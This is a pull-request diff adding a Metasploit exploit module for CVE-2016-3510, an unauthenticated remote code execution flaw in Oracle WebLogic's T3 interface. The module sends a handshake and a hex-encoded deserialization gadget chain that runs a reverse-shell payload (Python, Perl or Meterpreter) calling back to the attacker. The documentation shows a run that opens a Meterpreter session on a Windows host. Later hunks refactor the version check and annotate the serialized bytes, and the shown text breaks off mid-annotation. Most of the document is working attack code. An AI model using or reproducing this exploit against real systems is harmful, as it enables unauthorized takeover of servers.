### PR TITLE
Add Weblogic_serialize_marshalledobject CVE-2016-3510

### DIFF
--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
@@ -1,0 +1,35 @@
+## Description
+ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2016-3510), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
+## Vulnerable Application
+ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0.
+## Verification Steps
+ 1. `./msfconsole -q`
+ 2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
+ 3. `set rhosts <rhost>`
+ 4. `set rport <srvport>`
+ 6. `exploit`
+## Scenarios
+### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
+ ```
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
+ rhost => 192.168.192.6
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject > set rport 7001
+ rport => 7001
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit
+ 
+ [*] Started reverse TCP handler on 192.168.192.136:4444 
+ [*] 192.168.192.6:7001 - Sending handshake...
+ [*] 192.168.192.6:7001 - Sending T3 request object...
+ [*] 192.168.192.6:7001 - Sending client object payload...
+ [*] Sending stage (179779 bytes) to 192.168.192.6
+ [*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800
+
+ meterpreter > sysinfo
+ Computer        : GIOTTO-HS-W7
+ OS              : Windows 7 (Build 7600).
+ Architecture    : x64
+ System Language : en_US
+ Domain          : WORKGROUP
+ Logged On Users : 2
+ Meterpreter     : x86/windows
+ ```

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
@@ -16,7 +16,7 @@
  ```
  msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
  rhost => 192.168.192.6
- msf exploit(multi/misc/weblogic_deserialize_marshalledobject > set rport 7001
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001
  rport => 7001
  msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit
  

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
@@ -1,13 +1,16 @@
 ## Description
  Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2016-3510), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
+
 ## Vulnerable Application
  Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0.
+
 ## Verification Steps
  1. `./msfconsole -q`
  2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
  3. `set rhosts <rhost>`
  4. `set rport <srvport>`
  5. `exploit`
+
 ## Scenarios
 ### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
  ```

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
@@ -7,7 +7,7 @@
  2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
  3. `set rhosts <rhost>`
  4. `set rport <srvport>`
- 6. `exploit`
+ 5. `exploit`
 ## Scenarios
 ### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
  ```

--- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Powershell
 
   def initialize(info={})
@@ -21,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author' =>
         [
-        'Andres Rodriguez <arodriguez[at]2secure.org>',  # Metasploit Module - (@acamro, acamro[at]gmail.com)
+        'Andres Rodriguez <arodriguez[at]2secure.org>',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
         'Jacob Baines', # Vulnerability Discovery - Tenable Network Security
         'Jacob Robles'  # Metasploit Module Template
         ],
@@ -31,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2016-3510 ']
         ],
       'Privileged' => false,
-      'Platform'       => %w{ unix win solaris },
+      'Platform' => %w{ unix win solaris },
       'Targets' =>
         [
           [ 'Unix',
@@ -72,23 +73,22 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    connect
-    req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
-    req << "Host: #{peer}\n\n"
-    sock.put(req)
+    resp = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/console/login/LoginForm.jsp'
+    )
 
-    res = sock.get_once
+    return CheckCode::Unknown unless resp && resp.code == 200
 
-    disconnect
-    return CheckCode::Unknown unless res
-
-    unless res.include?('Oracle WebLogic Server Administration Console')
-      return CheckCode::Safe
+    unless resp.body.include?('Oracle WebLogic Server Administration Console')
+      vprint_warning("Oracle WebLogic Server banner cannot be found")
+      return CheckCode::Unknown
     end
 
-    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
+    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
     unless version
-      return CheckCode::Safe
+      vprint_warning("Oracle WebLogic Server version cannot be found")
+      return CheckCode::Unknown
     end
 
     version = Gem::Version.new(version)

--- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
@@ -1,0 +1,300 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => 'Oracle Weblogic Server Deserialization RCE - MarshalledObject',
+      'Description' => %q{
+        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
+        interface can send a serialized object (weblogic.corba.utils.MarshalledObject)
+        to the interface to execute code on vulnerable hosts.
+      },
+      'Author' =>
+        [
+        'Andres Rodriguez <arodriguez[at]2secure.org>',  # Metasploit Module - (@acamro, acamro[at]gmail.com)
+        'Jacob Baines', # Vulnerability Discovery - Tenable Network Security
+        'Jacob Robles'  # Metasploit Module Template
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2016-3510 ']
+        ],
+      'Privileged' => false,
+      'Platform'       => %w{ unix win solaris },
+      'Targets' =>
+        [
+          [ 'Unix',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
+            'Payload' => {
+              'Encoder' => 'cmd/ifs',
+              'BadChars' => ' ',
+              'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
+            }
+          ],
+          [ 'Windows',
+            'Platform' => 'win',
+            'Payload' => {},
+            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
+          ],
+          [ 'Solaris',
+            'Platform' => 'solaris',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
+            'Payload' => {
+              'Space'       => 2048,
+              'DisableNops' => true,
+              'Compat'      =>
+                {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'generic perl telnet',
+                }
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'RPORT' => 7001,
+          'WfsDelay' => 12
+        },
+      'DisclosureDate' => 'Jul 19 2016'))
+  end
+
+  def check
+    connect
+    req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
+    req << "Host: #{peer}\n\n"
+    sock.put(req)
+
+    res = sock.get_once
+
+    disconnect
+    return CheckCode::Unknown unless res
+
+    /WebLogic Server Version: (?<version>\d+\.\d+\.\d*\.*\d*)/ =~ res
+    if version
+      version = Gem::Version.new(version)
+      print_status("Detected Oracle WebLogic Server Version: #{version.to_s}")
+
+      case
+      when version.to_s.start_with?('10.3')
+        return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
+      when version.to_s.start_with?('12.1.3')
+        return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
+      when version.to_s.start_with?('12.2')
+        return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
+      end
+    end
+
+    if res.include?('Oracle WebLogic Server Administration Console')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Unknown
+  end
+
+  def t3_handshake
+    shake = '74332031322e322e310a41533a323535'
+    shake << '0a484c3a31390a4d533a313030303030'
+    shake << '30300a0a'
+
+    sock.put([shake].pack('H*'))
+    sleep(1)
+    sock.get_once
+  end
+
+  def build_t3_request_object
+    # T3 request serialized data
+    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
+    data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
+    data << '700000000a000000030000000000000006007070707070700000000a00000003'
+    data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
+    data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
+    data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
+    data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
+    data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
+    data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
+    data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
+    data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
+    data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
+    data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
+    data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
+    data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
+    data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
+    data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
+    data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
+    data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
+    data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
+    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
+    data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
+    data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
+    data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
+    data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
+    data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
+    data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
+    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
+    data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
+    data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
+    data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
+    data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
+    data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
+    data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
+    data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
+    data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
+    data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
+    data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
+    data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
+    data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
+    data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
+    data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
+    data << '2d4147444d565155423154362e656883348cd6000000070000'
+
+    data << rport.to_s(16).rjust(4, '0')
+
+    data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
+    data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
+    data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
+    data << '863d1d0000000078'
+
+    sock.put([data].pack('H*'))
+    sleep(1)
+    sock.get_once
+  end
+
+  def send_payload_objdata
+    # payload creation
+    if target.name == 'Windows'
+      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
+      mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
+    else if target.name == 'Unix'
+      nix_cmd = payload.encoded
+      nix_cmd.prepend('/bin/sh -c ')
+      mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
+    else if target.name == 'Solaris'
+      sol_cmd = payload.encoded
+      mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
+    end
+
+    serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
+    serialized_cmd << mycmd
+
+    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
+    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
+    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
+    payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
+    payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
+    payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
+    payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
+    payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
+    payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
+    payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
+    payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
+    payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
+    payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
+    payload << '78707702000078fe010000'
+
+    # marshalledobject
+    payload << 'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d6172'
+    payload << '7368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b'
+    payload << '00086f626a42797465737400025b42787021210fdc757200025b42acf317f806'
+    payload << '0854e002000078700000'
+    payload << ((mycmd.length >> 1) + 1392).to_s(16).rjust(4,'0')
+    payload << 'aced00057372003273756e2e7265666c6563742e'
+    payload << '616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48'
+    payload << '616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c756573'
+    payload << '74000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176'
+    payload << '612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c'
+    payload << '2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e1'
+    payload << '27da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c'
+    payload << '6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372'
+    payload << '002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73'
+    payload << '2e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f72'
+    payload << '7974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c65637469'
+    payload << '6f6e732f5472616e73666f726d65723b78707372003a6f72672e617061636865'
+    payload << '2e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e4368'
+    payload << '61696e65645472616e73666f726d657230c797ec287a97040200015b000d6954'
+    payload << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f'
+    payload << '6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7870757200'
+    payload << '2d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e'
+    payload << '732e5472616e73666f726d65723bbd562af1d834189902000078700000000573'
+    payload << '72003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e'
+    payload << '732e66756e63746f72732e436f6e7374616e745472616e73666f726d65725876'
+    payload << '90114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c61'
+    payload << '6e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d'
+    payload << '65000000000000000000000078707372003a6f72672e6170616368652e636f6d'
+    payload << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65'
+    payload << '725472616e73666f726d657287e8ff6b7b7cce380200035b0005694172677374'
+    payload << '00135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e'
+    payload << '616d657400124c6a6176612f6c616e672f537472696e673b5b000b6950617261'
+    payload << '6d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200'
+    payload << '135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078'
+    payload << '700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e'
+    payload << '672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d'
+    payload << '6574686f647571007e001e00000002767200106a6176612e6c616e672e537472'
+    payload << '696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e'
+    payload << '001b00000002707571007e001b00000000740006696e766f6b657571007e001e'
+    payload << '00000002767200106a6176612e6c616e672e4f626a6563740000000000000000'
+    payload << '00000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e67'
+    payload << '2e537472696e673badd256e7e91d7b4702000078700000000174'
+
+
+    payload << serialized_cmd
+
+    payload << '740004657865637571007e001e0000000171007e00237371007e001173720011'
+    payload << '6a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576'
+    payload << '616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
+    payload << '020000787000000001737200116a6176612e7574696c2e486173684d61700507'
+    payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
+    payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
+    payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
+
+    # serialized end
+
+    payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
+    payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
+    payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
+    payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
+    payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
+    payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
+    payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
+    payload << '6f3b290000001b7878fe00ff'
+
+    data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
+    data << payload
+
+    sock.put([data].pack('H*'))
+    sleep(1)
+    sock.get_once
+
+  end
+
+  def exploit
+    connect
+
+    print_status('Sending handshake...')
+    t3_handshake
+
+    print_status('Sending T3 request object...')
+    build_t3_request_object
+
+    print_status('Sending client object payload...')
+    send_payload_objdata
+
+    handler
+    disconnect
+  end
+end
+

--- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
@@ -84,26 +84,27 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect
     return CheckCode::Unknown unless res
 
-    /WebLogic Server Version: (?<version>\d+\.\d+\.\d*\.*\d*)/ =~ res
-    if version
-      version = Gem::Version.new(version)
-      print_status("Detected Oracle WebLogic Server Version: #{version.to_s}")
-
-      case
-      when version.to_s.start_with?('10.3')
-        return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
-      when version.to_s.start_with?('12.1.3')
-        return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
-      when version.to_s.start_with?('12.2')
-        return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
-      end
+    unless res.include?('Oracle WebLogic Server Administration Console')
+      return CheckCode::Safe
     end
 
-    if res.include?('Oracle WebLogic Server Administration Console')
-      return CheckCode::Detected
+    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
+    unless version
+      return CheckCode::Safe
     end
 
-    CheckCode::Unknown
+    version = Gem::Version.new(version)
+    vprint_good("Detected Oracle WebLogic Server Version: #{version}")
+    case
+    when version.to_s.start_with?('10.3')
+      return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
+    when version.to_s.start_with?('12.1.3')
+      return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
+    when version.to_s.start_with?('12.2')
+      return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
+    end
+
+    return CheckCode::Safe
   end
 
   def t3_handshake
@@ -179,11 +180,11 @@ class MetasploitModule < Msf::Exploit::Remote
     if target.name == 'Windows'
       pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
       mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
-    elseif target.name == 'Unix'
+    elsif target.name == 'Unix'
       nix_cmd = payload.encoded
       nix_cmd.prepend('/bin/sh -c ')
       mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
-    elseif target.name == 'Solaris'
+    elsif target.name == 'Solaris'
       sol_cmd = payload.encoded
       mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
     end

--- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::Remote::HttpClient
+  #include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Powershell
 
   def initialize(info={})
@@ -22,9 +22,9 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author' =>
         [
-        'Andres Rodriguez <arodriguez[at]2secure.org>',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
-        'Jacob Baines', # Vulnerability Discovery - Tenable Network Security
-        'Jacob Robles'  # Metasploit Module Template
+        'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
+        'Jacob Baines',      # Vulnerability Discovery - Tenable Network Security
+        'Aaron Soto'         # Reverse Engineering JSO and ysoserial blobs
         ],
       'License' => MSF_LICENSE,
       'References' =>
@@ -72,6 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([Opt::RPORT(7001)])
   end
 
+=begin   This check is currently incompatible with the Tcp mixin.  :-(
   def check
     resp = send_request_cgi(
       'method' => 'GET',
@@ -104,14 +105,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Safe
   end
+=end
 
   def t3_handshake
     # retrieved from network traffic
-    shake = '74332031322e322e310a41533a323535'
-    shake << '0a484c3a31390a4d533a313030303030'
-    shake << '30300a0a'
+    shake = "t3 12.2.1\n"
+    shake << "AS:255\n"
+    shake << "HL:19\n"
+    shake << "MS:10000000\n\n"
 
-    sock.put([shake].pack('H*'))
+    sock.put(shake)
     sleep(1)
     sock.get_once
   end
@@ -119,56 +122,211 @@ class MetasploitModule < Msf::Exploit::Remote
   def build_t3_request_object
     # T3 request serialized data
     # retrieved by watching network traffic
-    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
+    # This is a proprietary, undocumented protocol
+    # TODO: WHAT DOES THIS DO?  CAN WE RANDOMIZE ANY OF IT?
+    data =  '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
     data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
     data << '700000000a000000030000000000000006007070707070700000000a00000003'
-    data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
-    data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
-    data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
-    data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
-    data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
-    data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
-    data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
-    data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
-    data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
-    data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
-    data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
-    data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
-    data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
-    data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
-    data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
-    data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
-    data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
-    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
-    data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
-    data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
-    data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
-    data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
-    data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
-    data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
-    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
-    data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
-    data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
-    data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
-    data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
-    data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
-    data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
-    data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
-    data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
-    data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
-    data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
-    data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
-    data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
-    data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
-    data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
-    data << '2d4147444d565155423154362e656883348cd6000000070000'
+    data << '0000000000000006007006'
 
-    data << rport.to_s(16).rjust(4, '0')
+    data << 'fe010000'                                     # ----- separator -----
 
-    data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
-    data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
-    data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
-    data << '863d1d0000000078'
+    data << 'aced0005'                                     # JSO v5 header
+    data << '73'                                           # object header
+    data << '72001d'                                       # className (29 bytes):
+    data << '7765626c6f6769632e726a766d2e436c617373'       #   weblogic.rjvm.ClassTableEntry
+    data << '5461626c65456e747279'                         #   (continued)
+    data << '2f52658157f4f9ed'                             #   serialVersionUID
+    data << '0c00007870'                                   #   remainder of object header
+    data << '72'                                           # object header
+    data << '00247765626c6f6769632e636f6d6d6f6e2e696e74'   #   className (36 bytes): weblogic.common.internal.PackageInfo
+    data << '65726e616c2e5061636b616765496e666f'           #   (continued)
+    data << 'e6f723e7b8ae1ec9'                             #   serialVersionUID
+    data << '02'                                           #   SC_SERIALIZABLE
+    data << '0008'                                         #   fieldCount = 8
+    data << '4900056d616a6f72'                             #     0: Int: major
+    data << '4900056d696e6f72'                             #     1: Int: minor
+    data << '49000c726f6c6c696e675061746368'               #     2: Int rollingPatch
+    data << '49000b736572766963655061636b'                 #     3: Int: servicePack
+    data << '5a000e74656d706f726172795061746368'           #     4: Bool: temporaryPatch
+    data << '4c0009696d706c5469746c65'                     #     5: Obj: implTitle
+    data << '7400124c6a6176612f6c616e672f537472696e673b'   #        java/lang/String
+    data << '4c000a696d706c56656e646f72'                   #     6: Obj: implVendor
+    data << '71007e0003'                                   #        (Handle) 0x007e0003
+    data << '4c000b696d706c56657273696f6e'                 #     7: Obj: implVersion
